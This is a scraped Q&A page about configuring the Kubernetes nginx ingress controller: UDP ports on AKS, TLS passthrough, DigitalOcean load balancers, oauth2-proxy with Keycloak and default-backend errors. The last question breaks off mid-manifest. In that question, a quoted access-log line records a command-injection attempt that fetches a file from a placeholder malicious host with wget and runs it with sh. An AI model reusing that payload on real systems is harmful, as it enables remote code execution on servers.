Currently I am using the Helm chart of the Kubernetes nginx ingress controller to configure a UDP listener. Here is my Helm chart configuration.
I have added udp-services-configmap: $(POD_NAMESPACE)/nginx-ingress-udp as part of the extra arguments.
Here is my Helm values file:
## nginx configuration
## Ref: https://github.com/kubernetes/ingress-nginx/blob/master/controllers/nginx/configuration.md
##
controller:
image:
repository: k8s.gcr.io/ingress-nginx/controller
tag: "v0.40.2"
digest: sha256:46ba23c3fbaafd9e5bd01ea85b2f921d9f2217be082580edc22e6c704a83f02f
pullPolicy: IfNotPresent
runAsUser: 101
allowPrivilegeEscalation: true
# Configures the ports the nginx-controller listens on
containerPort:
http: 80
https: 443
udp: 9012
dnsPolicy: ClusterFirst
reportNodeInternalIp: false
hostNetwork: false
hostPort:
enabled: true
ports:
udp: 9012
# http: 80
# https: 443
electionID: ingress-controller-leader
ingressClass: nginx
publishService:
enabled: true
pathOverride: ""
scope:
enabled: false
namespace: "" # defaults to .Release.Namespace
configMapNamespace: "" # defaults to .Release.Namespace
tcp:
configMapNamespace: "" # defaults to .Release.Namespace
annotations: {}
udp:
configMapNamespace: "" # defaults to .Release.Namespace
annotations: {}
extraArgs:
udp-services-configmap: $(POD_NAMESPACE)/nginx-ingress-udp
extraEnvs: []
kind: Deployment
annotations: {}
updateStrategy:
rollingUpdate:
maxUnavailable: 1
type: RollingUpdate
minReadySeconds: 0
nodeSelector:
kubernetes.io/os: linux
livenessProbe:
failureThreshold: 5
initialDelaySeconds: 10
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 1
port: 10254
readinessProbe:
failureThreshold: 3
initialDelaySeconds: 10
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 1
port: 10254
healthCheckPath: "/healthz"
podAnnotations: {}
replicaCount: 1
minAvailable: 1
resources:
requests:
cpu: 100m
memory: 90Mi
autoscaling:
enabled: false
minReplicas: 1
maxReplicas: 11
targetCPUUtilizationPercentage: 50
targetMemoryUtilizationPercentage: 50
autoscalingTemplate: []
enableMimalloc: true
customTemplate:
configMapName: ""
configMapKey: ""
service:
enabled: true
annotations: {}
labels: {}
externalIPs: []
loadBalancerSourceRanges: []
enableHttp: true
enableHttps: true
ports:
http: 80
https: 443
udp: 9012
targetPorts:
http: http
https: https
udp: 9012
type: LoadBalancer
nodePorts:
http: ""
https: ""
tcp: {}
udp: {}
internal:
enabled: false
annotations: {}
extraContainers: []
extraVolumeMounts: []
extraVolumes: []
extraInitContainers: []
admissionWebhooks:
annotations: {}
enabled: true
failurePolicy: Fail
port: 8443
certificate: "/usr/local/certificates/cert"
key: "/usr/local/certificates/key"
namespaceSelector: {}
objectSelector: {}
service:
annotations: {}
externalIPs: []
loadBalancerSourceRanges: []
servicePort: 443
type: ClusterIP
patch:
enabled: true
image:
repository: docker.io/jettech/kube-webhook-certgen
tag: v1.3.0
pullPolicy: IfNotPresent
priorityClassName: ""
podAnnotations: {}
nodeSelector: {}
tolerations: []
runAsUser: 2000
tcp: {}
udp: {}
I have also added this ConfigMap:
apiVersion: v1
kind: ConfigMap
metadata:
name: nginx-ingress-udp
namespace: ingress-nginx
data:
"9012": "services/service-listener:9012"
Here is the resulting ingress service. When I get the service, I see two problems:
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
iot-ingress-ingress-nginx-controller LoadBalancer 10.0.209.232 150.22.44.23 80:31694/TCP,443:30330/TCP 5h42m
1. I do not see port 9012 exposed as UDP.
2. How am I supposed to reach the UDP listener through the load balancer IP? Say I want to connect to port 9012 via the load balancer IP 150.22.44.23.
Is it at all necessary to use hostPort/hostNetwork after all? I am not sure, please guide me. My end goal is #2.
I am using AKS, by the way.
According to the NGINX ingress documentation, after creating a ConfigMap for UDP load balancing you have to create a Service that exposes those ports for the ingress controller.
You can do it by following the official guide, for example:
apiVersion: v1
kind: Service
metadata:
name: ingress-nginx
labels:
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/part-of: ingress-nginx
spec:
type: LoadBalancer
ports:
- name: proxied-tcp-9012
port: 9012
targetPort: 9012
protocol: UDP
selector:
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/part-of: ingress-nginx
And the output will be similar to this:
$kubectl get svc | grep ingress-nginx
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S)
ingress-nginx LoadBalancer 10.0.0.237 12.345.67.89 9012:32291/UDP
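To answer the second part of the question: once the Service has an external IP, UDP traffic sent to that IP on port 9012 should be forwarded to the backend defined in the ConfigMap. A rough smoke test from outside the cluster, using the load balancer IP from the question (exact netcat flags vary by variant):
# send one UDP datagram to the ingress load balancer and wait ~1s for any reply
echo "test" | nc -u -w1 150.22.44.23 9012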
Related
I have deployed the NGINX Operator and NGINX Ingress Controller per the following GitHub repo and the secrets from devopscube.
The current setup is:
AWS Classic LB -> ROSA Cluster [Helm NGINX-Ingress-Controller -> NGINX-Ingress -> Service -> Pod]
Here is the YAML file I used to create the NGINX-Ingress-Controller resource. You will see that enableTLSPassthrough is set to true; however, I am unsure it is taking effect. My goal is end-to-end TLS encryption from the client to the NGINX service/pod. Right now I am met with error code 400 when accessing it in a browser over HTTP (HTTP works perfectly fine in the hello-world setup):
"400 Bad Request The plain HTTP request was sent to HTTPS port"
kind: NginxIngress
apiVersion: charts.nginx.org/v1alpha1
metadata:
name: nginxingress
namespace: nginx-ingress
spec:
controller:
affinity: {}
appprotect:
enable: false
appprotectdos:
debug: false
enable: false
maxDaemons: 0
maxWorkers: 0
memory: 0
config:
annotations: {}
entries: {}
customPorts: []
defaultTLS:
secret: nginx-ingress/default-server-secret
enableCertManager: false
enableCustomResources: true
enableExternalDNS: false
enableLatencyMetrics: false
enableOIDC: false
enablePreviewPolicies: false
enableSnippets: false
enableTLSPassthrough: true
extraContainers: []
globalConfiguration:
create: false
spec: {}
healthStatus: false
healthStatusURI: /nginx-health
hostNetwork: false
image:
pullPolicy: IfNotPresent
repository: nginx/nginx-ingress
tag: 2.3.0-ubi
ingressClass: nginx
initContainers: []
kind: deployment
logLevel: 1
nginxDebug: false
nginxReloadTimeout: 60000
nginxStatus:
allowCidrs: 127.0.0.1
enable: true
port: 8080
nginxplus: false
nodeSelector: {}
pod:
annotations: {}
extraLabels: {}
priorityClassName: null
readyStatus:
enable: true
port: 8081
replicaCount: 1
reportIngressStatus:
annotations: {}
enable: true
enableLeaderElection: true
ingressLink: ''
resources:
requests:
cpu: 100m
memory: 128Mi
service:
annotations: {}
create: true
customPorts: []
externalIPs: []
externalTrafficPolicy: Local
extraLabels: {}
httpPort:
enable: true
nodePort: ''
port: 80
targetPort: 80
httpsPort:
enable: true
nodePort: ''
port: 443
targetPort: 443
loadBalancerIP: ''
loadBalancerSourceRanges: []
type: LoadBalancer
serviceAccount:
imagePullSecretName: ''
setAsDefaultIngress: true
terminationGracePeriodSeconds: 30
tolerations: []
volumeMounts: []
volumes: []
watchNamespace: ''
wildcardTLS:
secret: null
nginxServiceMesh:
enable: false
enableEgress: false
prometheus:
create: true
port: 9113
scheme: http
secret: ''
rbac:
create: true
Taking a look at the NGINX-Ingress-Controller pod logs on creation, I can see nothing about TLS being enabled. A flag does get set in the args section once the pod deploys, but I am still unsure this is working.
W0802 20:33:26.594545 1 flags.go:273] Ignoring unhandled arguments: []
I0802 20:33:26.594683 1 flags.go:190] Starting NGINX Ingress Controller Version=2.3.0 PlusFlag=false
I0802 20:33:26.594689 1 flags.go:191] Commit=979db22d8065b22fedb410c9b9c5875cf0a6dc66 Date=2022-07-12T08:51:24Z DirtyState=false Arch=linux/amd64 Go=go1.18.3
I0802 20:33:26.601340 1 main.go:210] Kubernetes version: 1.22.0
I0802 20:33:26.606551 1 main.go:326] Using nginx version: nginx/1.23.0
2022/08/02 20:33:26 [notice] 13#13: using the "epoll" event method
2022/08/02 20:33:26 [notice] 13#13: nginx/1.23.0
2022/08/02 20:33:26 [notice] 13#13: built by gcc 8.5.0 20210514 (Red Hat 8.5.0-4) (GCC)
2022/08/02 20:33:26 [notice] 13#13: OS: Linux 4.18.0-305.19.1.el8_4.x86_64
2022/08/02 20:33:26 [notice] 13#13: getrlimit(RLIMIT_NOFILE): 1048576:1048576
2022/08/02 20:33:26 [notice] 13#13: start worker processes
2022/08/02 20:33:26 [notice] 13#13: start worker process 15
2022/08/02 20:33:26 [notice] 13#13: start worker process 16
2022/08/02 20:33:26 [notice] 13#13: start worker process 17
2022/08/02 20:33:26 [notice] 13#13: start worker process 18
I0802 20:33:26.630298 1 listener.go:54] Starting Prometheus listener on: :9113/metrics
I0802 20:33:26.630860 1 leaderelection.go:248] attempting to acquire leader lease nginx-ingress/nginxingress-nginx-ingress-leader-election...
I0802 20:33:26.639466 1 leaderelection.go:258] successfully acquired lease nginx-ingress/nginxingress-nginx-ingress-leader-election
Here is the Ingress resource YAML:
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: nginx-ingress
annotations:
# kubernetes.io/ingress.class: addon-http-application-routing
# nginx.ingress.kubernetes.io/force-ssl-redirect: "true"
# nginx.ingress.kubernetes.io/ssl-redirect: "true"
# nginx.ingress.kubernetes.io/proxy-redirect-from: https
# nginx.ingress.kubernetes.io/proxy-redirect-to: https
nginx.ingress.kubernetes.io/backend-protocol: "HTTPS"
# nginx.ingress.kubernetes.io/proxy-ssl-protocols: "HTTPS"
# nginx.ingress.kubernetes.io/secure-backends: "true"
spec:
defaultBackend:
service:
name: nginx
port:
number: 443
ingressClassName: nginx
tls:
- hosts:
- nginx-tlssni.apps.clustername.openshiftapps.com
secretName: nginx-tls
rules:
- host: "nginx-tlssni.apps.clustername.openshiftapps.com"
http:
paths:
- pathType: Prefix
path: /
backend:
service:
name: nginx
port:
number: 443
Thank you for your insight :)
There are many kinds of NGINX-based ingress controllers. The two that are most easily confused are the NGINX Inc. ingress controller and the CNCF/Kubernetes community ingress-nginx controller.
My understanding is that nginx.ingress.kubernetes.io/backend-protocol: "HTTPS" is for the CNCF/Kubernetes community ingress-nginx controller.
Now to your question: based on this example, try changing your annotations to the following:
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: nginx-ingress
annotations:
nginx.org/ssl-services: "nginx" # Name of your k8s service with TLS
...
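For context, here is a sketch of how the Ingress from the question might look with that annotation in place (hostname, secret, and service name are copied from the question; treat it as illustrative rather than authoritative):
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: nginx-ingress
  annotations:
    # NGINX Inc. controller: proxy to the "nginx" service over TLS
    nginx.org/ssl-services: "nginx"
spec:
  ingressClassName: nginx
  tls:
    - hosts:
        - nginx-tlssni.apps.clustername.openshiftapps.com
      secretName: nginx-tls
  rules:
    - host: "nginx-tlssni.apps.clustername.openshiftapps.com"
      http:
        paths:
          - pathType: Prefix
            path: /
            backend:
              service:
                name: nginx
                port:
                  number: 443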
I have my A record on Netlify mapped to my load balancer IP address on DigitalOcean, and it's able to hit the nginx server, but I'm getting a 404 when trying to access any of the app's APIs. I noticed that the status of my Ingress doesn't show that it is bound to the load balancer.
Does anybody know what I am missing to get this set up?
Application Ingress:
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: d2d-server
spec:
rules:
- host: api.cloud.myhostname.com
http:
paths:
- backend:
service:
name: d2d-server
port:
number: 443
path: /
pathType: ImplementationSpecific
Application Service:
apiVersion: v1
kind: Service
metadata:
name: d2d-server
spec:
selector:
app: d2d-server
ports:
- name: http-api
protocol: TCP
port: 443
targetPort: 8080
type: ClusterIP
Ingress Controller:
apiVersion: apps/v1
kind: Deployment
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
uid: fc64d9f6-a935-49b2-9d7a-b862f660a4ea
resourceVersion: '257931'
generation: 1
creationTimestamp: '2021-10-22T05:31:26Z'
labels:
app.kubernetes.io/component: controller
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/version: 1.0.4
helm.sh/chart: ingress-nginx-4.0.6
annotations:
deployment.kubernetes.io/revision: '1'
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: controller
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/name: ingress-nginx
template:
metadata:
creationTimestamp: null
labels:
app.kubernetes.io/component: controller
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/name: ingress-nginx
spec:
volumes:
- name: webhook-cert
secret:
secretName: ingress-nginx-admission
defaultMode: 420
containers:
- name: controller
image: >-
k8s.gcr.io/ingress-nginx/controller:v1.0.4@sha256:545cff00370f28363dad31e3b59a94ba377854d3a11f18988f5f9e56841ef9ef
args:
- /nginx-ingress-controller
- '--publish-service=$(POD_NAMESPACE)/ingress-nginx-controller'
- '--election-id=ingress-controller-leader'
- '--controller-class=k8s.io/ingress-nginx'
- '--configmap=$(POD_NAMESPACE)/ingress-nginx-controller'
- '--validating-webhook=:8443'
- '--validating-webhook-certificate=/usr/local/certificates/cert'
- '--validating-webhook-key=/usr/local/certificates/key'
ports:
- name: http
containerPort: 80
protocol: TCP
- name: https
containerPort: 443
protocol: TCP
- name: webhook
containerPort: 8443
protocol: TCP
env:
- name: POD_NAME
valueFrom:
fieldRef:
apiVersion: v1
fieldPath: metadata.name
- name: POD_NAMESPACE
valueFrom:
fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
- name: LD_PRELOAD
value: /usr/local/lib/libmimalloc.so
resources:
requests:
cpu: 100m
memory: 90Mi
volumeMounts:
- name: webhook-cert
readOnly: true
mountPath: /usr/local/certificates/
livenessProbe:
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
timeoutSeconds: 1
periodSeconds: 10
successThreshold: 1
failureThreshold: 5
readinessProbe:
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
timeoutSeconds: 1
periodSeconds: 10
successThreshold: 1
failureThreshold: 3
lifecycle:
preStop:
exec:
command:
- /wait-shutdown
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
imagePullPolicy: IfNotPresent
securityContext:
capabilities:
add:
- NET_BIND_SERVICE
drop:
- ALL
runAsUser: 101
allowPrivilegeEscalation: true
restartPolicy: Always
terminationGracePeriodSeconds: 300
dnsPolicy: ClusterFirst
nodeSelector:
kubernetes.io/os: linux
serviceAccountName: ingress-nginx
serviceAccount: ingress-nginx
securityContext: {}
schedulerName: default-scheduler
strategy:
type: RollingUpdate
rollingUpdate:
maxUnavailable: 25%
maxSurge: 25%
revisionHistoryLimit: 10
progressDeadlineSeconds: 600
Load Balancer:
apiVersion: v1
kind: Service
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
labels:
app.kubernetes.io/component: controller
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/version: 1.0.4
helm.sh/chart: ingress-nginx-4.0.6
annotations:
kubernetes.digitalocean.com/load-balancer-id: <LB_ID>
service.beta.kubernetes.io/do-loadbalancer-enable-proxy-protocol: 'true'
service.beta.kubernetes.io/do-loadbalancer-name: ingress-nginx
service.beta.kubernetes.io/do-loadbalancer-protocol: https
status:
loadBalancer:
ingress:
- ip: <IP_HIDDEN>
spec:
ports:
- name: http
protocol: TCP
appProtocol: http
port: 80
targetPort: http
nodePort: 31661
- name: https
protocol: TCP
appProtocol: https
port: 443
targetPort: https
nodePort: 32761
selector:
app.kubernetes.io/component: controller
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/name: ingress-nginx
clusterIP: <IP_HIDDEN>
clusterIPs:
- <IP_HIDDEN>
type: LoadBalancer
sessionAffinity: None
externalTrafficPolicy: Local
healthCheckNodePort: 30477
ipFamilies:
- IPv4
ipFamilyPolicy: SingleStack
I just needed to add the field ingressClassName: nginx to the Ingress spec.
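In other words, the working manifest differs from the one above by a single line; a sketch for reference (everything else copied from the question):
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: d2d-server
spec:
  ingressClassName: nginx   # the missing line
  rules:
    - host: api.cloud.myhostname.com
      http:
        paths:
          - backend:
              service:
                name: d2d-server
                port:
                  number: 443
            path: /
            pathType: ImplementationSpecific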
A kind: Ingress resource defines proxy rules for routing traffic from the ingress controller to in-cluster services. But to achieve this, outside traffic first needs to reach the ingress controller.
https://kubernetes.io/docs/concepts/services-networking/ingress/#what-is-ingress
Let's assume that the "client" in that diagram is our load balancer.
So what I assume you want to do is point your load balancer at the ingress controller; then, based on your Ingress rules, it will route traffic to your (in this case) d2d service.
To point an LB at a pod, you need to create a Service resource with the spec.type: LoadBalancer field. I modified an example from DigitalOcean that should match your needs. Notice the annotations on the Service, which can modify the load balancer parameters; you can find more on this here: https://github.com/digitalocean/digitalocean-cloud-controller-manager/blob/master/docs/controllers/services/annotations.md
apiVersion: v1
kind: Service
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
annotations:
# Edit: set to http since no certificate is provided
service.beta.kubernetes.io/do-loadbalancer-protocol: "http"
service.beta.kubernetes.io/do-loadbalancer-name: "<YOUR_LB_NAME>"
spec:
type: LoadBalancer
selector:
app.kubernetes.io/component: controller
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/version: 1.0.4
helm.sh/chart: ingress-nginx-4.0.6
ports:
- name: http
protocol: TCP
port: 80
targetPort: 80
- name: https
protocol: TCP
port: 443
targetPort: 443
- name: webhook
protocol: TCP
port: 8443
targetPort: 8443
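Once that Service is applied, a quick way to confirm the cloud load balancer was provisioned and to grab its external IP (names assume the manifest above):
kubectl get svc ingress-nginx-controller -n ingress-nginx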
I'm trying to run a minimalistic sample of oauth2-proxy with Keycloak. I used oauth2-proxy's Kubernetes example, which uses Dex, to build up my Keycloak example.
The problem is that I can't seem to get the proxy to work:
# kubectl get pods
NAME READY STATUS RESTARTS AGE
httpbin-774999875d-zbczh 1/1 Running 0 2m49s
keycloak-758d7c758-27pgh 1/1 Running 0 2m49s
oauth2-proxy-5875dd67db-8qwqn 0/1 CrashLoopBackOff 2 2m49s
Logs indicate a network error:
# kubectl logs oauth2-proxy-5875dd67db-8qwqn
[2021/09/22 08:14:56] [main.go:54] Get "http://keycloak.localtest.me/auth/realms/master/.well-known/openid-configuration": dial tcp 127.0.0.1:80: connect: connection refused
I believe I have set up the ingress correctly, though.
Steps to reproduce
Set up the cluster:
# Create kind cluster
wget https://raw.githubusercontent.com/oauth2-proxy/oauth2-proxy/master/contrib/local-environment/kubernetes/kind-cluster.yaml
kind create cluster --name oauth2-proxy --config kind-cluster.yaml
#Setup dns
wget https://raw.githubusercontent.com/oauth2-proxy/oauth2-proxy/master/contrib/local-environment/kubernetes/custom-dns.yaml
kubectl apply -f custom-dns.yaml
kubectl -n kube-system rollout restart deployment/coredns
kubectl -n kube-system rollout status --timeout 5m deployment/coredns
#Setup ingress
kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/static/provider/kind/deploy.yaml
kubectl --namespace ingress-nginx rollout status --timeout 5m deployment/ingress-nginx-controller
#Deploy
#import keycloak master realm
wget https://raw.githubusercontent.com/oauth2-proxy/oauth2-proxy/master/contrib/local-environment/keycloak/master-realm.json
kubectl create configmap keycloak-import-config --from-file=master-realm.json=master-realm.json
Deploy the test application. My deployment.yaml file:
###############oauth2-proxy#############
apiVersion: apps/v1
kind: Deployment
metadata:
creationTimestamp: null
labels:
name: oauth2-proxy
name: oauth2-proxy
spec:
replicas: 1
selector:
matchLabels:
name: oauth2-proxy
template:
metadata:
labels:
name: oauth2-proxy
spec:
containers:
- args:
- --provider=oidc
- --oidc-issuer-url=http://keycloak.localtest.me/auth/realms/master
- --upstream="file://dev/null"
- --client-id=oauth2-proxy
- --client-secret=72341b6d-7065-4518-a0e4-50ee15025608
- --cookie-secret=x-1vrrMhC-886ITuz8ySNw==
- --email-domain=*
- --scope=openid profile email users
- --cookie-domain=.localtest.me
- --whitelist-domain=.localtest.me
- --pass-authorization-header=true
- --pass-access-token=true
- --pass-user-headers=true
- --set-authorization-header=true
- --set-xauthrequest=true
- --cookie-refresh=1m
- --cookie-expire=30m
- --http-address=0.0.0.0:4180
image: quay.io/oauth2-proxy/oauth2-proxy:latest
# image: "quay.io/pusher/oauth2_proxy:v5.1.0"
name: oauth2-proxy
ports:
- containerPort: 4180
name: http
protocol: TCP
livenessProbe:
httpGet:
path: /ping
port: http
scheme: HTTP
initialDelaySeconds: 0
timeoutSeconds: 1
readinessProbe:
httpGet:
path: /ping
port: http
scheme: HTTP
initialDelaySeconds: 0
timeoutSeconds: 1
successThreshold: 1
periodSeconds: 10
resources:
{}
---
apiVersion: v1
kind: Service
metadata:
labels:
app: oauth2-proxy
name: oauth2-proxy
spec:
type: ClusterIP
ports:
- port: 4180
targetPort: 4180
name: http
selector:
name: oauth2-proxy
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
labels:
app: oauth2-proxy
name: oauth2-proxy
annotations:
nginx.ingress.kubernetes.io/server-snippet: |
large_client_header_buffers 4 32k;
spec:
rules:
- host: oauth2-proxy.localtest.me
http:
paths:
- path: /
backend:
serviceName: oauth2-proxy
servicePort: 4180
---
# ######################httpbin##################
apiVersion: apps/v1
kind: Deployment
metadata:
name: httpbin
spec:
replicas: 1
selector:
matchLabels:
name: httpbin
template:
metadata:
labels:
name: httpbin
spec:
containers:
- image: kennethreitz/httpbin:latest
name: httpbin
resources: {}
ports:
- name: http
containerPort: 80
protocol: TCP
livenessProbe:
httpGet:
path: /
port: http
readinessProbe:
httpGet:
path: /
port: http
hostname: httpbin
restartPolicy: Always
---
apiVersion: v1
kind: Service
metadata:
name: httpbin-svc
labels:
app: httpbin
spec:
type: ClusterIP
ports:
- port: 80
targetPort: http
protocol: TCP
name: http
selector:
name: httpbin
---
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: httpbin
labels:
name: httpbin
annotations:
nginx.ingress.kubernetes.io/auth-response-headers: X-Auth-Request-User,X-Auth-Request-Email
nginx.ingress.kubernetes.io/auth-signin: http://oauth2-proxy.localtest.me/oauth2/start
nginx.ingress.kubernetes.io/auth-url: http://oauth2-proxy.localtest.me/oauth2/auth
spec:
rules:
- host: httpbin.localtest.me
http:
paths:
- path: /
backend:
serviceName: httpbin-svc
servicePort: 80
---
# ######################keycloak#############
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: keycloak
name: keycloak
spec:
replicas: 1
selector:
matchLabels:
app: keycloak
template:
metadata:
labels:
app: keycloak
spec:
containers:
- args:
- -Dkeycloak.migration.action=import
- -Dkeycloak.migration.provider=singleFile
- -Dkeycloak.migration.file=/etc/keycloak_import/master-realm.json
- -Dkeycloak.migration.strategy=IGNORE_EXISTING
env:
- name: KEYCLOAK_PASSWORD
value: password
- name: KEYCLOAK_USER
value: admin@example.com
- name: KEYCLOAK_HOSTNAME
value: keycloak.localtest.me
- name: PROXY_ADDRESS_FORWARDING
value: "true"
image: quay.io/keycloak/keycloak:15.0.2
# image: jboss/keycloak:10.0.0
name: keycloak
ports:
- name: http
containerPort: 8080
- name: https
containerPort: 8443
readinessProbe:
httpGet:
path: /auth/realms/master
port: 8080
volumeMounts:
- mountPath: /etc/keycloak_import
name: keycloak-config
hostname: keycloak
volumes:
- configMap:
defaultMode: 420
name: keycloak-import-config
name: keycloak-config
---
apiVersion: v1
kind: Service
metadata:
name: keycloak-svc
labels:
app: keycloak
spec:
type: ClusterIP
sessionAffinity: None
ports:
- name: http
targetPort: http
port: 8080
selector:
app: keycloak
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: keycloak
spec:
tls:
- hosts:
- "keycloak.localtest.me"
rules:
- host: "keycloak.localtest.me"
http:
paths:
- path: /
backend:
serviceName: keycloak-svc
servicePort: 8080
---
# kubectl apply -f deployment.yaml
Configure the /etc/hosts file on the development machine to include the localtest.me domains:
127.0.0.1 oauth2-proxy.localtest.me
127.0.0.1 keycloak.localtest.me
127.0.0.1 httpbin.localtest.me
127.0.0.1 localhost
Note that I can reach http://keycloak.localtest.me/auth/realms/master/.well-known/openid-configuration with no problem from my host browser. It appears that the oauth2-proxy pod cannot reach the service via the ingress. I would really appreciate any sort of help here.
It turned out that I needed to add keycloak to custom-dns.yaml.
apiVersion: v1
data:
Corefile: |
.:53 {
errors
health {
lameduck 5s
}
ready
kubernetes cluster.local in-addr.arpa ip6.arpa {
pods insecure
fallthrough in-addr.arpa ip6.arpa
ttl 30
}
prometheus :9153
forward . /etc/resolv.conf
cache 30
loop
reload
loadbalance
hosts {
10.244.0.1 dex.localtest.me. # <----Configured for dex
10.244.0.1 oauth2-proxy.localtest.me
fallthrough
}
}
kind: ConfigMap
metadata:
name: coredns
namespace: kube-system
With keycloak added, it looks like this:
apiVersion: v1
data:
Corefile: |
.:53 {
errors
health {
lameduck 5s
}
ready
kubernetes cluster.local in-addr.arpa ip6.arpa {
pods insecure
fallthrough in-addr.arpa ip6.arpa
ttl 30
}
prometheus :9153
forward . /etc/resolv.conf
cache 30
loop
reload
loadbalance
hosts {
10.244.0.1 keycloak.localtest.me
10.244.0.1 oauth2-proxy.localtest.me
fallthrough
}
}
kind: ConfigMap
metadata:
name: coredns
namespace: kube-system
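After editing the ConfigMap, the change still needs to be rolled out; re-running the same commands from the setup steps should do it (restarting oauth2-proxy afterwards is my assumption, so that it retries the OIDC discovery):
kubectl apply -f custom-dns.yaml
kubectl -n kube-system rollout restart deployment/coredns
kubectl -n kube-system rollout status --timeout 5m deployment/coredns
# restart oauth2-proxy so it retries fetching the discovery document
kubectl rollout restart deployment/oauth2-proxy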
I have an issue where all unknown endpoints get a 400 returned by the ingress controller itself; it does not send that traffic to the default backend. Other traffic to defined Ingress endpoints works fine.
I noticed this in my ingress controller's logs because every night I get what look to be hand-rolled compromise attempts, and I assume the attacker (or script) keeps trying because they're getting 400s and not 404s, so these paths are presumed to be potentially accessible endpoints when they are not.
I am unsure whether it's due to the way I deployed my nginx-ingress-controller or because of how I have set up my Ingresses. The ingress controller is really just a generic Helm deployment.
Here is part of its deployment manifest:
Name: fashionable-gopher-nginx-ingress-controller
Namespace: kube-system
CreationTimestamp: Tue, 03 Jul 2018 14:02:46 -0700
Labels: app=nginx-ingress
chart=nginx-ingress-0.20.3
component=controller
heritage=Tiller
release=fashionable-gopher
Annotations: deployment.kubernetes.io/revision=1
Selector: app=nginx-ingress,component=controller,release=fashionable-gopher
Replicas: 1 desired | 1 updated | 1 total | 1 available | 0 unavailable
StrategyType: RollingUpdate
MinReadySeconds: 0
RollingUpdateStrategy: 1 max unavailable, 1 max surge
Pod Template:
Labels: app=nginx-ingress
component=controller
release=fashionable-gopher
Service Account: fashionable-gopher-nginx-ingress
Containers:
nginx-ingress-controller:
Image: quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.14.0
Ports: 80/TCP, 443/TCP
Host Ports: 0/TCP, 0/TCP
Args:
/nginx-ingress-controller
--default-backend-service=kube-system/fashionable-gopher-nginx-ingress-default-backend
Here's an example 400 in the logs, which should be a 404 (no "login.cgi" endpoint exists anywhere):
10.244.3.1 - [10.244.3.1] - - [22/Aug/2018:23:52:35 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://some.malicious.ip.address/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 174 "-" "Hakai/2.0" 203 0.000 [] - - - -
Here's the default backend:
Name: fashionable-gopher-nginx-ingress-default-backend
Namespace: kube-system
CreationTimestamp: Tue, 03 Jul 2018 14:02:46 -0700
Labels: app=nginx-ingress
chart=nginx-ingress-0.20.3
component=default-backend
heritage=Tiller
release=fashionable-gopher
Annotations: deployment.kubernetes.io/revision=1
Selector: app=nginx-ingress,component=default-backend,release=fashionable-gopher
Replicas: 1 desired | 1 updated | 1 total | 1 available | 0 unavailable
StrategyType: RollingUpdate
MinReadySeconds: 0
RollingUpdateStrategy: 1 max unavailable, 1 max surge
Pod Template:
Labels: app=nginx-ingress
component=default-backend
release=fashionable-gopher
Containers:
nginx-ingress-default-backend:
Image: k8s.gcr.io/defaultbackend:1.3
Lastly, here are some pieces from the nginx.conf in the ingress controller. I'm not an expert in nginx configs, but it looks correct to me:
...
upstream upstream-default-backend {
    least_conn;
    keepalive 32;
    server 10.100.3.10:8080 max_fails=0 fail_timeout=0;
}
location / {
log_by_lua_block {
}
if ($scheme = https) {
more_set_headers "Strict-Transport-Security: max-age=15724800; includeSubDomains";
}
access_log off;
port_in_redirect off;
set $proxy_upstream_name "upstream-default-backend";
set $namespace "";
set $ingress_name "";
set $service_name "";
client_max_body_size "1m";
# In case of errors try the next upstream server before returning an error
proxy_next_upstream error timeout invalid_header http_502 http_503 http_504;
proxy_next_upstream_tries 0;
proxy_pass http://upstream-default-backend;
proxy_redirect off;
}
One note: before I set up my first Ingresses (for other domains), traffic did make it to my default backend and returned 404s.
What should I do now to debug this issue and figure out why these requests are not getting sent to my default backend?
Edit:
Here's the default backend's deployment definition:
kubectl get deployment fashionable-gopher-nginx-ingress-default-backend -o yaml -n kube-system
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: 2018-07-03T21:02:46Z
generation: 1
labels:
app: nginx-ingress
chart: nginx-ingress-0.20.3
component: default-backend
heritage: Tiller
release: fashionable-gopher
name: fashionable-gopher-nginx-ingress-default-backend
  namespace: kube-system
  resourceVersion:
spec:
  progressDeadlineSeconds: 600
  replicas: 1
  revisionHistoryLimit: 10
  selector:
matchLabels:
app: nginx-ingress
component: default-backend
      release: fashionable-gopher
  strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
    type: RollingUpdate
  template:
metadata:
creationTimestamp: null
labels:
app: nginx-ingress
component: default-backend
release: fashionable-gopher
spec:
containers:
